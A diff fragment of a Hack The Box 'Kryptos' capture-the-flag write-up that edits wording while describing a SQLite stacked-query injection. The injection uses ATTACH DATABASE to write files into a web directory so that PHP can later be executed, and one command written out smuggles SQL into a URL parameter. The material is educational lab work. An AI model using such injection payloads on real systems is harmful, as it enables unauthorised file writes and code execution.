slemire/slemire.github.io/_posts/2019-09-21-htb-writeup-kryptos.md

 </html>
 ```

-Sqlite supports stacked queries so that allows us to write arbitrary files.
-We can create a new database in the `d9e28afcf0b274a5e0542abb67db0784` directory and write data into a table.
+Sqlite supports stacked queries so that allows me to write arbitrary files.
+I can create a new database in the `d9e28afcf0b274a5e0542abb67db0784` directory and write PHP data into a table.
 Then by issuing a GET to that file the PHP code should be reached and executed.

 First, I tested writing a simple text file with no PHP code.

 ```
-root@ragingunicorn:~/htb/kryptos# python decrypthttp.py "http://127.0.0.1/dev/sqlite_test_page.php?no_results=1&bookid=1" ";ATTACH DATABASE 'd9e28afcf0b274a5e0542abb67db0784/test.txt' AS snow; CREATE TABLE snow.pwn (yolo text); INSERT INTO snow.pwn (yolo) VALUES ('Testing...');"
+# python decrypthttp.py "http://127.0.0.1/dev/sqlite_test_page.php?no_results=1&bookid=1" ";ATTACH DATABASE 'd9e28afcf0b274a5e0542abb67db0784/test.txt' AS snow; CREATE TABLE snow.pwn (yolo text); INSERT INTO snow.pwn (yolo) VALUES ('Testing...');"
 <html>
 <head></head>
 <body>